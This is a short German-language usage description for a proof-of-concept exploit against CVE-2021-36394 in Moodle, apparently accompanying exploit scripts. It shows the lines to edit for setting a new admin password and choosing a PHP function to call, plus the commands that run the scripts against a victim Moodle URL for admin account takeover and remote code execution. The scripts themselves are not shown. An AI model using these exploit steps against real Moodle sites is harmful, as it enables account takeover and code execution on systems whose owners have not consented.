
Proof-of-Concept-Exploit für CVE-2021-36394 in Moodle, der die Übernahme des Admin-Passworts und Remote-Code-Ausführung über benutzerdefinierte PHP-Funktionen ermöglicht.
Eigener Code
$newpassword = "Accounttakedover123";
Dann ausführen:
$ CVE2021-36394.php http://victim/path_to_moodle
Eigener Code
$function = "header"; $param = "Hacked: by0d0ff9";
Dann ausführen:
$ CVE2021-36394_RCE.php http://victim/path_to_moodle